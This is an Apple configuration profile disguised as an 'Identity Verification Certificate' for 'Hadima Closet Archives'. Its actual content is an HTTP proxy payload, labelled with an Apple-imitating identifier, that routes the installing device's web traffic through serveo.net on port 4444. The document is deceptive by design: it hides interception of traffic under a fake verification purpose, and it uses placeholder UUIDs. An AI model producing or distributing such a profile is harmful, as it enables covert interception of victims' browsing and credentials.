<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadDescription</key>
            <string>Identity Verification for Hadima Closet Archives</string>
            <key>PayloadDisplayName</key>
            <string>Hadima Verification Certificate</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.proxy.setup</string>
            <key>PayloadType</key>
            <string>com.apple.proxy.http</string>
            <key>PayloadUUID</key>
            <string>12345-67890</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>ProxyServer</key>
            <string>serveo.net</string>
            <key>ProxyPort</key>
            <integer>4444</integer>
        </dict>
    </array>
    <key>PayloadDisplayName</key>
    <string>Hadima Identity Service</string>
    <key>PayloadIdentifier</key>
    <string>com.hadima.verify</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>09876-54321</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
